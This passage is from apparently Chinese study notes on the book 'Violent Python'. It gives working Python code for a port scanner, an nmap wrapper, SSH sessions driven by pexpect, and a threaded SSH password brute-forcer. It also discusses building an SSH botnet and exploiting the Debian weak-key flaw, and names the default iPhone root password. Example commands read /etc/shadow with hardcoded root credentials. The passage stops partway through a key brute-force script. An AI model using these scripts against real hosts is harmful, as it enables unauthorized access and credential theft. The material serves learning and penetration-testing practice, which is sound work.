<h2 id="编写一个端口扫描器">编写一个端口扫描器</h2>

<p>Python 提供了访问 BSD 套接字的接口</p>

<p>Web 服务器可能位于 TCP 80 端口、电子邮件服务器在 TCP 25 端口、FTP 服务器在 TCP 21 端口</p>

<h3 id="tcp-全连接扫描">TCP 全连接扫描</h3>

<p>为了抓取目标主机上应用的 Banner，找到开放的端口后，向它发送一个数据串并等待响应</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/bin/env python3
# -*- coding: utf-8 -*-
# version: Python3.X
</span><span class="s">"""
2017.01.29 按照第 2 章编写一个端口扫描器
"""</span>
<span class="kn">import</span> <span class="nn">optparse</span>
<span class="kn">import</span> <span class="nn">socket</span>

<span class="n">__author__</span> <span class="o">=</span> <span class="s">'__L1n__w@tch'</span>


<span class="k">def</span> <span class="nf">initialize</span><span class="p">():</span>
    <span class="n">parser</span> <span class="o">=</span> <span class="n">optparse</span><span class="p">.</span><span class="n">OptionParser</span><span class="p">(</span><span class="s">"usage %prog -H &lt;target host&gt; -p &lt;target port&gt;"</span><span class="p">)</span>

    <span class="n">parser</span><span class="p">.</span><span class="n">add_option</span><span class="p">(</span><span class="s">"-H"</span><span class="p">,</span> <span class="n">dest</span><span class="o">=</span><span class="s">"target_host"</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="nb">str</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="s">"specify target host"</span><span class="p">)</span>
    <span class="n">parser</span><span class="p">.</span><span class="n">add_option</span><span class="p">(</span><span class="s">"-p"</span><span class="p">,</span> <span class="n">dest</span><span class="o">=</span><span class="s">"target_port"</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="nb">int</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="s">"specify target port"</span><span class="p">)</span>

    <span class="n">options</span><span class="p">,</span> <span class="n">args</span> <span class="o">=</span> <span class="n">parser</span><span class="p">.</span><span class="n">parse_args</span><span class="p">()</span>

    <span class="n">target_host</span> <span class="o">=</span> <span class="n">options</span><span class="p">.</span><span class="n">target_host</span>
    <span class="n">target_port</span> <span class="o">=</span> <span class="n">options</span><span class="p">.</span><span class="n">target_port</span>

    <span class="k">if</span> <span class="n">target_host</span> <span class="ow">is</span> <span class="bp">None</span> <span class="ow">or</span> <span class="n">target_port</span> <span class="ow">is</span> <span class="bp">None</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="n">parser</span><span class="p">.</span><span class="n">usage</span><span class="p">)</span>
        <span class="nb">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span>

    <span class="k">return</span> <span class="n">target_host</span><span class="p">,</span> <span class="n">target_port</span>


<span class="k">def</span> <span class="nf">connect_scan</span><span class="p">(</span><span class="n">target_host</span><span class="p">,</span> <span class="n">target_port</span><span class="p">):</span>
    <span class="s">"""
    TCP 全连接扫描
    :param target_host: 目标主机
    :param target_port: 目标端口
    :return:
    """</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="n">conn_sock</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="p">.</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">socket</span><span class="p">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span>
        <span class="n">conn_sock</span><span class="p">.</span><span class="n">connect</span><span class="p">((</span><span class="n">target_host</span><span class="p">,</span> <span class="n">target_port</span><span class="p">))</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] {}/tcp open"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">target_port</span><span class="p">))</span>

        <span class="n">conn_sock</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="sa">b</span><span class="s">"Violent Python"</span><span class="p">)</span>
        <span class="n">results</span> <span class="o">=</span> <span class="n">conn_sock</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">1024</span><span class="p">)</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Get Response: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">results</span><span class="p">))</span>
        <span class="n">conn_sock</span><span class="p">.</span><span class="n">close</span><span class="p">()</span>
    <span class="k">except</span> <span class="n">socket</span><span class="p">.</span><span class="n">timeout</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[-] {}/tcp closed"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">target_port</span><span class="p">))</span>


<span class="k">def</span> <span class="nf">port_scan</span><span class="p">(</span><span class="n">target_host</span><span class="p">,</span> <span class="n">target_ports</span><span class="p">):</span>
    <span class="s">"""
    执行端口扫描操作
    :param target_host: 目标主机
    :param target_ports: 目标端口列表
    :return:
    """</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="n">target_ip</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">gethostbyname</span><span class="p">(</span><span class="n">target_host</span><span class="p">)</span>
    <span class="k">except</span> <span class="nb">RuntimeError</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[-] Can not resolve {}: Unknown host"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">target_host</span><span class="p">))</span>
        <span class="k">return</span>

    <span class="k">try</span><span class="p">:</span>
        <span class="n">target_name</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">gethostbyaddr</span><span class="p">(</span><span class="n">target_ip</span><span class="p">)</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Scan results for {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">target_name</span><span class="p">[</span><span class="mi">0</span><span class="p">]))</span>
    <span class="k">except</span> <span class="nb">RuntimeError</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Scan Results for {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">target_ip</span><span class="p">))</span>

    <span class="n">socket</span><span class="p">.</span><span class="n">setdefaulttimeout</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>

    <span class="k">for</span> <span class="n">target_port</span> <span class="ow">in</span> <span class="n">target_ports</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[*] Scanning port {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">target_port</span><span class="p">))</span>
        <span class="n">connect_scan</span><span class="p">(</span><span class="n">target_host</span><span class="p">,</span> <span class="n">target_port</span><span class="p">)</span>


<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">"__main__"</span><span class="p">:</span>
    <span class="n">host</span><span class="p">,</span> <span class="n">port</span> <span class="o">=</span> <span class="n">initialize</span><span class="p">()</span>
    <span class="n">port_scan</span><span class="p">(</span><span class="n">host</span><span class="p">,</span> <span class="p">[</span><span class="n">port</span><span class="p">])</span>

</code></pre></div></div>

<h4 id="线程扫描">线程扫描</h4>

<p>多线程可以提升速度，但是有一个缺点，屏幕打印消息可能会出现乱码和失序。因此需要信号量来进行加解锁，在打印消息前使用 <code class="language-plaintext highlighter-rouge">acquire()</code>，打印结束后使用 <code class="language-plaintext highlighter-rouge">release()</code></p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">screen_lock</span> <span class="o">=</span> <span class="n">Semaphore</span><span class="p">(</span><span class="n">value</span><span class="o">=</span><span class="mi">1</span><span class="p">)</span>
<span class="k">try</span><span class="p">:</span>
    <span class="n">screen_lock</span><span class="p">.</span><span class="n">acquire</span><span class="p">()</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"print anything"</span><span class="p">)</span>
<span class="k">finally</span><span class="p">:</span>
    <span class="n">screen_lock</span><span class="p">.</span><span class="n">release</span><span class="p">()</span>
</code></pre></div></div>

<h4 id="使用-nmap-端口扫描代码">使用 NMAP 端口扫描代码</h4>

<p>除了 TCP 连接扫描外，还需要其他类型的扫描，比如 ACK、RST、FIN 或 SYN-ACK 扫描等</p>

<p>Fyodor Vaskovich 编写的 Nmap 能使用 C 和 Lua 编写的脚本，但是 Nmap 还能被很好地整合到 Python 中。Nmap 可以生成基于 XML 的输出。</p>

<h5 id="其他端口扫描类型">其他端口扫描类型</h5>

<ul>
  <li>TCP SYN SCAN——半开放扫描，这种类型的扫描发送一个 SYN 包，启动一个 TCP 会话，并等待响应的数据包。如果收到的是一个 reset 包，表明端口是关闭的，而如果收到的是一个 SYN/ACK 包，则表示相应的端口是打开的</li>
  <li>TCP NULL SCAN——NULL 扫描把 TCP 头中的所有标志位都设为 NULL。如果收到的是一个 RST 包，则表示相应的端口是关闭的</li>
  <li>TCP FIN SCAN——TCP FIN 扫描发送一个表示拆除一个活动的 TCP 连接的 FIN 包，让对方关闭连接。如果收到了一个 RST 包，则表示相应的端口是关闭的</li>
  <li>TCP XMAS SCAN——TCP XMAS 扫描发送 PSH、FIN、URG 和 TCP 标志位被设为 1 的数据包。如果收到了一个 RST 包，则表示相应的端口是关闭的</li>
</ul>

<hr />

<p>安装好 Python-Nmap 之后，就可以将 Nmap 导入到现有的脚本中，并在 Python 中直接使用 Nmap 扫描功能。创建一个 PortScanner（） 类对象，则可以用这个对象完成扫描操作。PortScanner 类有一个 <code class="language-plaintext highlighter-rouge">scan()</code> 函数，它可将目标和端口的列表作为参数输入，并对它们进行基本的 Nmap 扫描。</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">nmap</span>

<span class="k">def</span> <span class="nf">nmap_scan</span><span class="p">(</span><span class="n">target_host</span><span class="p">,</span> <span class="n">target_port</span><span class="p">):</span>
    <span class="n">nm_scan</span> <span class="o">=</span> <span class="n">nmap</span><span class="p">.</span><span class="n">PortScanner</span><span class="p">()</span>
    <span class="n">nm_scan</span><span class="p">.</span><span class="n">scan</span><span class="p">(</span><span class="n">target_host</span><span class="p">,</span> <span class="n">target_port</span><span class="p">)</span>
    <span class="n">state</span> <span class="o">=</span> <span class="n">nm_scan</span><span class="p">[</span><span class="n">target_host</span><span class="p">][</span><span class="s">"tcp"</span><span class="p">][</span><span class="nb">int</span><span class="p">(</span><span class="n">target_port</span><span class="p">)][</span><span class="s">"state"</span><span class="p">]</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[*] {} tcp/{} {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">target_host</span><span class="p">,</span> <span class="n">target_port</span><span class="p">,</span> <span class="n">state</span><span class="p">))</span>
</code></pre></div></div>

<h2 id="用-python-构建一个-ssh-僵尸网络">用 Python 构建一个 SSH 僵尸网络</h2>

<p>Morris 蠕虫有三种攻击方式，其中之一就是用常见的用户名和密码尝试登录 RSH 服务（remote shell）。RSH 是 1988 年问世的，它为系统管理员提供了一种很棒的远程连接一台机器，并能在主机上运行一系列终端命令对它进行管理的办法。</p>

<p>后来人们在 RSH 中增加一个公钥加密算法，以保护其经过网络传递的数据，这就是 SSH（Secure Shell）协议，最终 SSH 取代了 RSH。</p>

<p>SSH 蠕虫已经被证明是非常成功的和常见的攻击方式</p>

<h3 id="用-pexpect-与-ssh-交互">用 Pexpect 与 SSH 交互</h3>

<p>为了能完成控制台交互过程，需要用 Pexpect 模块实现与程序交互、等待预期的屏幕输出等。</p>

<p>以下实现 <code class="language-plaintext highlighter-rouge">connect()</code> 函数，该函数接收用户名、主机名和密码，返回此 SSH 连接的结果。</p>

<p>一旦通过验证，就可以使用一个单独的 <code class="language-plaintext highlighter-rouge">command()</code> 函数在 SSH 会话中发送命令。</p>

<p>【PS】下面这个在 macOSX 上就没跑通过，相关问题<a href="http://stackoverflow.com/questions/17879585/eof-when-using-pexpect-and-pxssh">链接</a></p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">pexpect</span>

<span class="n">PROMPT</span> <span class="o">=</span> <span class="p">[</span><span class="s">"# "</span><span class="p">,</span> <span class="s">"&gt;&gt;&gt; "</span><span class="p">,</span> <span class="s">"&gt; "</span><span class="p">,</span> <span class="s">"\$ "</span><span class="p">]</span>

<span class="k">def</span> <span class="nf">send_command</span><span class="p">(</span><span class="n">child</span><span class="p">,</span> <span class="n">cmd</span><span class="p">):</span>
    <span class="n">child</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">cmd</span><span class="p">)</span>
    <span class="n">child</span><span class="p">.</span><span class="n">expect</span><span class="p">(</span><span class="n">PROMPT</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="n">child</span><span class="p">.</span><span class="n">before</span><span class="p">)</span>

<span class="k">def</span> <span class="nf">connect</span><span class="p">(</span><span class="n">user</span><span class="p">,</span> <span class="n">host</span><span class="p">,</span> <span class="n">password</span><span class="p">):</span>
    <span class="n">ssh_new_key</span> <span class="o">=</span> <span class="s">"Are you sure you want to continue connecting</span><span class="se">\n</span><span class="s">"</span>
    <span class="n">conn_str</span> <span class="o">=</span> <span class="s">"ssh {}@{}</span><span class="se">\n</span><span class="s">"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">user</span><span class="p">,</span> <span class="n">host</span><span class="p">)</span>
    <span class="n">child</span> <span class="o">=</span> <span class="n">pexpect</span><span class="p">.</span><span class="n">spawn</span><span class="p">(</span><span class="n">conn_str</span><span class="p">)</span>
    <span class="n">ret</span> <span class="o">=</span> <span class="n">child</span><span class="p">.</span><span class="n">expect</span><span class="p">([</span><span class="n">pexpect</span><span class="p">.</span><span class="n">TIMEOUT</span><span class="p">,</span> <span class="n">ssh_new_key</span><span class="p">,</span> <span class="s">"{}@{}'s password:"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">user</span><span class="p">,</span> <span class="n">host</span><span class="p">)])</span>

    <span class="k">if</span> <span class="n">ret</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[-] Error Connecting"</span><span class="p">)</span>
        <span class="nb">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span>
    <span class="k">elif</span> <span class="n">ret</span> <span class="o">==</span> <span class="mi">1</span><span class="p">:</span>
        <span class="n">child</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="s">"yes"</span><span class="p">)</span>
        <span class="n">ret</span> <span class="o">=</span> <span class="n">child</span><span class="p">.</span><span class="n">expect</span><span class="p">([</span><span class="n">pexpect</span><span class="p">.</span><span class="n">TIMEOUT</span><span class="p">,</span> <span class="s">"[P|p]assword:"</span><span class="p">])</span>
        <span class="k">if</span> <span class="n">ret</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[-] Error Connecting"</span><span class="p">)</span>
            <span class="nb">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span>
        <span class="n">child</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">password</span><span class="p">)</span>
        <span class="n">child</span><span class="p">.</span><span class="n">expect</span><span class="p">(</span><span class="n">PROMPT</span><span class="p">)</span>
        <span class="k">return</span> <span class="n">child</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="n">child</span><span class="p">)</span>
    <span class="nb">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span>

<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">"__main__"</span><span class="p">:</span>
    <span class="n">child</span> <span class="o">=</span> <span class="n">connect</span><span class="p">(</span><span class="s">"root"</span><span class="p">,</span> <span class="s">"192.168.158.157"</span><span class="p">,</span> <span class="s">"toor"</span><span class="p">)</span>
    <span class="n">send_command</span><span class="p">(</span><span class="n">child</span><span class="p">,</span> <span class="s">"cat /etc/shadow | grep root"</span><span class="p">)</span>
</code></pre></div></div>

<h3 id="用-pxssh-暴力破解-ssh-密码">用 Pxssh 暴力破解 ssh 密码</h3>

<p>Pxssh 导入方式：<code class="language-plaintext highlighter-rouge">import pexpect.pxssh</code></p>

<p>Pxssh 是一个包含了 <code class="language-plaintext highlighter-rouge">pexpect</code> 库的专用脚本，它能用预先写好的 <code class="language-plaintext highlighter-rouge">login()</code>、<code class="language-plaintext highlighter-rouge">logout()</code> 和 <code class="language-plaintext highlighter-rouge">prompt()</code> 等函数直接与 <code class="language-plaintext highlighter-rouge">SSH</code> 进行交互。</p>

<p>【PS】以下仅实现了连接功能，但是依旧连接不上，问题同上。</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">pexpect.pxssh</span> <span class="k">as</span> <span class="n">pxssh</span>
<span class="kn">import</span> <span class="nn">traceback</span>

<span class="k">def</span> <span class="nf">send_command</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="n">cmd</span><span class="p">):</span>
    <span class="n">s</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">cmd</span><span class="p">)</span>
    <span class="n">s</span><span class="p">.</span><span class="n">prompt</span><span class="p">()</span>
    <span class="k">print</span><span class="p">(</span><span class="n">s</span><span class="p">.</span><span class="n">before</span><span class="p">)</span>

<span class="k">def</span> <span class="nf">connect</span><span class="p">(</span><span class="n">host</span><span class="p">,</span> <span class="n">user</span><span class="p">,</span> <span class="n">password</span><span class="p">):</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="n">s</span> <span class="o">=</span> <span class="n">pxssh</span><span class="p">.</span><span class="n">pxssh</span><span class="p">()</span>
        <span class="n">s</span><span class="p">.</span><span class="n">login</span><span class="p">(</span><span class="n">host</span><span class="p">,</span> <span class="n">user</span><span class="p">,</span> <span class="n">password</span><span class="p">)</span>
        <span class="k">return</span> <span class="n">s</span>
    <span class="k">except</span> <span class="nb">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
        <span class="n">traceback</span><span class="p">.</span><span class="n">print_exc</span><span class="p">()</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[-] Error Connecting"</span><span class="p">)</span>
        <span class="nb">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span>

<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">"__main__"</span><span class="p">:</span>
    <span class="n">ssh</span> <span class="o">=</span> <span class="n">connect</span><span class="p">(</span><span class="s">"localhost"</span><span class="p">,</span> <span class="s">"root"</span><span class="p">,</span> <span class="s">"Lin982674"</span><span class="p">)</span>
    <span class="n">send_command</span><span class="p">(</span><span class="n">ssh</span><span class="p">,</span> <span class="s">"cat /etc/shadow | grep root"</span><span class="p">)</span>
</code></pre></div></div>

<p>接下来稍微修改下 <code class="language-plaintext highlighter-rouge">connect()</code> 函数即可实现爆破。如果异常显示 socket 为 <code class="language-plaintext highlighter-rouge">read_nonblocking</code>，可能是 SSH 服务器被大量的连接刷爆了；如果该异常显示 <code class="language-plaintext highlighter-rouge">pxssh</code> 命令提示符提取困难，可以等一会再试。这里实现的 <code class="language-plaintext highlighter-rouge">connect()</code> 可以递归地调用另一个 <code class="language-plaintext highlighter-rouge">connect()</code> 函数，所以必须让只有不是由 <code class="language-plaintext highlighter-rouge">connect()</code> 递归调用的 <code class="language-plaintext highlighter-rouge">connect()</code> 函数才能够释放 <code class="language-plaintext highlighter-rouge">connection_lock</code> 信号，书中给的最终脚本如下：</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">pexpect.pxssh</span> <span class="k">as</span> <span class="n">pxssh</span>
<span class="kn">import</span> <span class="nn">optparse</span>
<span class="kn">import</span> <span class="nn">time</span>
<span class="kn">import</span> <span class="nn">threading</span>

<span class="n">max_connections</span> <span class="o">=</span> <span class="mi">5</span>
<span class="n">connection_lock</span> <span class="o">=</span> <span class="n">threading</span><span class="p">.</span><span class="n">BoundedSemaphore</span><span class="p">(</span><span class="n">value</span><span class="o">=</span><span class="n">max_connections</span><span class="p">)</span>
<span class="n">found</span> <span class="o">=</span> <span class="bp">False</span>
<span class="n">fails</span> <span class="o">=</span> <span class="mi">0</span>

<span class="k">def</span> <span class="nf">connect</span><span class="p">(</span><span class="n">host</span><span class="p">,</span> <span class="n">user</span><span class="p">,</span> <span class="n">password</span><span class="p">,</span> <span class="n">release</span><span class="p">):</span>
    <span class="k">global</span> <span class="n">found</span><span class="p">,</span> <span class="n">fails</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="n">s</span> <span class="o">=</span> <span class="n">pxssh</span><span class="p">.</span><span class="n">pxssh</span><span class="p">()</span>
        <span class="n">s</span><span class="p">.</span><span class="n">login</span><span class="p">(</span><span class="n">host</span><span class="p">,</span> <span class="n">user</span><span class="p">,</span> <span class="n">password</span><span class="p">)</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Password Found: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">password</span><span class="p">))</span>
        <span class="n">found</span> <span class="o">=</span> <span class="bp">True</span>
    <span class="k">except</span> <span class="nb">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
        <span class="k">if</span> <span class="s">"read_nonblocking"</span> <span class="ow">in</span> <span class="nb">str</span><span class="p">(</span><span class="n">e</span><span class="p">):</span>
            <span class="n">fails</span> <span class="o">+=</span> <span class="mi">1</span>
            <span class="n">time</span><span class="p">.</span><span class="n">sleep</span><span class="p">(</span><span class="mi">5</span><span class="p">)</span>
            <span class="n">connect</span><span class="p">(</span><span class="n">host</span><span class="p">,</span> <span class="n">user</span><span class="p">,</span> <span class="n">password</span><span class="p">,</span> <span class="bp">False</span><span class="p">)</span>
        <span class="k">elif</span> <span class="s">"synchronize with original prompt"</span> <span class="ow">in</span> <span class="nb">str</span><span class="p">(</span><span class="n">e</span><span class="p">):</span>
            <span class="n">time</span><span class="p">.</span><span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
            <span class="n">connect</span><span class="p">(</span><span class="n">host</span><span class="p">,</span> <span class="n">user</span><span class="p">,</span> <span class="n">password</span><span class="p">,</span> <span class="bp">False</span><span class="p">)</span>
    <span class="k">finally</span><span class="p">:</span>
        <span class="k">if</span> <span class="n">release</span><span class="p">:</span>
            <span class="n">connection_lock</span><span class="p">.</span><span class="n">release</span><span class="p">()</span>

<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
    <span class="n">parser</span> <span class="o">=</span> <span class="n">optparse</span><span class="p">.</span><span class="n">OptionParser</span><span class="p">(</span><span class="s">"usage %prog -H &lt;target host&gt; -u &lt;user&gt; -F &lt;password list&gt;"</span><span class="p">)</span>
    <span class="n">parser</span><span class="p">.</span><span class="n">add_option</span><span class="p">(</span><span class="s">"-H"</span><span class="p">,</span> <span class="n">dest</span><span class="o">=</span><span class="s">"target_host"</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="nb">str</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="s">"specifiy target host"</span><span class="p">)</span>
    <span class="n">parser</span><span class="p">.</span><span class="n">add_option</span><span class="p">(</span><span class="s">"-F"</span><span class="p">,</span> <span class="n">dest</span><span class="o">=</span><span class="s">"password_file"</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="nb">str</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="s">"specifiy password file"</span><span class="p">)</span>
    <span class="n">parser</span><span class="p">.</span><span class="n">add_option</span><span class="p">(</span><span class="s">"-u"</span><span class="p">,</span> <span class="n">dest</span><span class="o">=</span><span class="s">"user"</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="nb">str</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="s">"specifiy the user"</span><span class="p">)</span>

    <span class="n">options</span><span class="p">,</span> <span class="n">args</span> <span class="o">=</span> <span class="n">parser</span><span class="p">.</span><span class="n">parse_args</span><span class="p">()</span>
    <span class="n">target_host</span> <span class="o">=</span> <span class="n">options</span><span class="p">.</span><span class="n">target_host</span>
    <span class="n">password_file</span> <span class="o">=</span> <span class="n">options</span><span class="p">.</span><span class="n">password_file</span>
    <span class="n">user</span> <span class="o">=</span> <span class="n">options</span><span class="p">.</span><span class="n">user</span>

    <span class="k">if</span> <span class="n">target_host</span> <span class="ow">is</span> <span class="bp">None</span> <span class="ow">or</span> <span class="n">password_file</span> <span class="ow">is</span> <span class="bp">None</span> <span class="ow">or</span> <span class="n">user</span> <span class="ow">is</span> <span class="bp">None</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="n">parser</span><span class="p">.</span><span class="n">usage</span><span class="p">)</span>
        <span class="nb">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span>

    <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">password_file</span><span class="p">,</span> <span class="s">"r"</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
        <span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">f</span><span class="p">.</span><span class="n">readlines</span><span class="p">():</span>
            <span class="k">if</span> <span class="n">found</span><span class="p">:</span>
                <span class="k">print</span><span class="p">(</span><span class="s">"[*] Exiing: Password Found"</span><span class="p">)</span>
                <span class="nb">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
            <span class="k">if</span> <span class="n">fails</span> <span class="o">&gt;</span> <span class="mi">5</span><span class="p">:</span>
                <span class="k">print</span><span class="p">(</span><span class="s">"[!] Exiting: Too Many Socket Timeouts"</span><span class="p">)</span>
                <span class="nb">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span>
            <span class="n">connection_lock</span><span class="p">.</span><span class="n">acquire</span><span class="p">()</span>
            <span class="n">password</span> <span class="o">=</span> <span class="n">line</span><span class="p">.</span><span class="n">strip</span><span class="p">(</span><span class="s">"</span><span class="se">\r\n</span><span class="s">"</span><span class="p">)</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[-] Testing: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">password</span><span class="p">))</span>
            <span class="n">t</span> <span class="o">=</span> <span class="n">threading</span><span class="p">.</span><span class="n">Thread</span><span class="p">(</span><span class="n">target</span><span class="o">=</span><span class="n">connect</span><span class="p">,</span> <span class="n">args</span><span class="o">=</span><span class="p">(</span><span class="n">host</span><span class="p">,</span> <span class="n">user</span><span class="p">,</span> <span class="n">password</span><span class="p">,</span> <span class="bp">True</span><span class="p">))</span>
            <span class="n">child</span> <span class="o">=</span> <span class="n">t</span><span class="p">.</span><span class="n">start</span><span class="p">()</span>

<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">"__main__"</span><span class="p">:</span>
    <span class="n">main</span><span class="p">()</span>
</code></pre></div></div>

<p>iPhone 设备上 root 用户的默认密码为：<code class="language-plaintext highlighter-rouge">alpine</code>，当设备越狱后，用户会在 iPhone 上启用一个 OpenSSH 服务</p>

<h3 id="利用-ssh-中的弱私钥">利用 SSH 中的弱私钥</h3>

<p>对于 SSH 服务器，密码验证并不是唯一的手段。除此之外，SSH 还能使用公钥加密的方式进行验证。在使用这一验证方法时，服务器和用户分别掌握公钥和私钥。使用 RSA 或是 RSA 算法，服务器能生成用于 SSH 登录的密钥。</p>

<p>不过，2006 年 Debian Linux 发行版中发生了一件有意思的事。软件自动分析工具发现了一行已被开发人员注释掉的代码。这行被注释掉的代码用来确保创建 SSH 密钥的信息量足够大。被注释掉之后，密钥空间的大小的熵值降低到只有 15 位大小。此时可能的密钥只有 32767 个。Rapid7 的 CSO 和 HD Moore 在两个小时内生成了所有的 1024 位和 2048 位算法的可能的密钥。而且，把结果放在了<a href="http://digitaloffense.net/tools/debianopenssl/">网上</a>中，大家都可以下载使用。</p>

<p>由此可以进行暴力破解，在使用密钥登录 SSH 时，需要键入 <code class="language-plaintext highlighter-rouge">ssh user@host -i keyfile -o PasswordAuthentication=no</code> 格式的一条命令。DEMO 代码如下：</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">pexpect</span>
<span class="kn">import</span> <span class="nn">optparse</span>
<span class="kn">import</span> <span class="nn">os</span>
<span class="kn">import</span> <span class="nn">threading</span>

<span class="n">max_connections</span> <span class="o">=</span> <span class="mi">5</span>
<span class="n">connection_lock</span> <span class="o">=</span> <span class="n">threading</span><span class="p">.</span><span class="n">BoundedSemaphore</span><span class="p">(</span><span class="n">value</span><span class="o">=</span><span class="n">max_connections</span><span class="p">)</span>
<span class="n">stop</span> <span class="o">=</span> <span class="bp">False</span>
<span class="n">fails</span> <span class="o">=</span> <span class="mi">0</span>

<span class="k">def</span> <span class="nf">connect</span><span class="p">(</span><span class="n">user</span><span class="p">,</span> <span class="n">host</span><span class="p">,</span> <span class="n">key_file</span><span class="p">,</span> <span class="n">release</span><span class="p">):</span>
    <span class="k">global</span> <span class="n">stop</span><span class="p">,</span> <span class="n">fails</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="n">perm_denied</span> <span class="o">=</span> <span class="s">"Permission denied"</span>
        <span class="n">ssh_new_key</span> <span class="o">=</span> <span class="s">"Are you sure you want to continue"</span>
        <span class="n">conn_closed</span> <span class="o">=</span> <span class="s">"Connection closed by remote host"</span>

        <span class="n">opt</span> <span class="o">=</span> <span class="s">" -o PasswordAuthentication=no"</span>
